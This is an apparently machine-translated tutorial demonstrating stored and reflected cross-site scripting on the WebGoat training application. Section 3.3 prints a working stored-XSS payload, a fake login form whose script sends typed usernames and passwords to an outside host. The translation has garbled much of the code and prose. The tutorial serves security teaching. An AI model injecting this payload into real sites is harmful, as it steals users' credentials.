Li Bai's Cross Site Scripting (XSS) attack

What is xss attack? the definition on the internet is as follows:
XSS, also known as CSS (Cross Site Script), is a Cross-Site scripting attack. A malicious attacker inserts malicious script code into a Web page. When a user browses this page, the script code embedded in the Web page is executed, this achieves the Special Purpose of malicious attacks to users. XSS is a passive attack, because it is passive and difficult to use, so many people often ignore its dangers.
Cross-site scripting (XSS) is one of the most common vulnerabilities in Web applications.
The following is a one-to-one demonstration of combining different xss categories with the webgoat project.
3.1 stored xss
The storage-type cross-site attack is a type of attack that is harmful to xss. It saves scripts to the database. Hazards will also be left on the page for a long time.
In step 1, you can use the tom account to log on to the system and use the tom account to perform xss attacks. When Jerry visits tom's page, it will be compromised.
We Log On with the tom account, select tom, click "viewprofile", and then click "editprofile"
The following page is displayed:

Enter <script> alert ('OK') </script> in any text box. Click "updateprofile"
At this time, the script has been executed and the alert box will pop up. Log out at this time. After logging on with the jerry account, select the tom user and click "viewprofile ".
 
This page indicates that the attack was successful.
Let's look at the reflective xss attack again.
3.2 Reflected XSS attack
This is the most common and most well-known XSS attack. When the Web Client submits data, the server immediately generates a result page for this customer. If the result page contains unverified client input data, the client script is allowed to be directly injected into the dynamic page. The traditional example is the site search engine. If we search for a string containing special HTML characters, we usually still have this string on the return page to tell us what we are searching, if the returned strings are not encoded, an XSS vulnerability exists.
After logging on to larry, click "searchstaff", paste the <script> alert ('OK') </script> code, and click "findprofile ", the script will be executed and the alert box will pop up.
It seems that up to now, we have demonstrated that the so-called xss attack has been put on the website. In fact, only the xss vulnerability exists. Hackers can use this vulnerability to do many things. Next, we will take one of the many dangers as a demonstration.
3.3 get the password in the stored xss Hanging Box

This is a two-text box with the comment function, one title and one content. Enter 1 as the title and paste the following code into the content section:

<Script>

Function hack (){

XSSImage = new Image;
XSSImage. src = "http://photo.163.com /? PROPERTY = yes & user = "+ document. forms [1]. user. value +" & password = "+ document. forms [1]. pass. value + "";
Alert (XSSImage. src );
}

</Script>

<Form> <br> <HR> <H3> This featurere quires account login: </H3> <br> Enter Username: <br> <input type = "text" id = "user" name = "user"> <br> Enter Password: <br> <input type = "password" name = "pass"> <br> <input type = "submit" name = "login" value = "login" onclick = "hack () "> </form> <br> <HR>


Click "submit". The following figure is displayed:
A comment with the title "1" appears in the Message list. Click this comment:
A login box appears, as if this website needs to be logged in to view comments, but once you log in, your account and password will be automatically sent to the attacker. Let's explain this Code:

<Form> <br> <HR> <H3> This featurere quires account login: </H3> <br> Enter Username: <br> <input type = "text" id = "user" name = "user"> <br> Enter Password: <br> <input type = "password" name = "pass"> <br> <input type = "submit" name = "login" value = "login" onclick = "hack () "> </form> <br> <HR>
This Code creates two text boxes, one is the username with id = users, and the other is the password box. Then there is a submit button. The button event contains an hack () and the content of the hack () method is as follows:

<Script>

Function hack (){

XSSImage = new Image;
XSSImage. src = "http://photo.163.com /? PROPERTY = yes & user = "+ document. forms [1]. user. value +" & password = "+ document. forms [1]. pass. value + "";
Alert (XSSImage. src );
}

</Script>

This Code is interpreted as follows: first create an Image object, XSSImage. src indicates setting or returning the image URL, and the URL configuration content is the leaked account and password; alert (XSSImage. src) This statement is used to verify that we have obtained the account and password, which can be removed and is useless to attacks. After submitting the account and password, for example:
Indicates that the account password has been obtained and the attack is complete.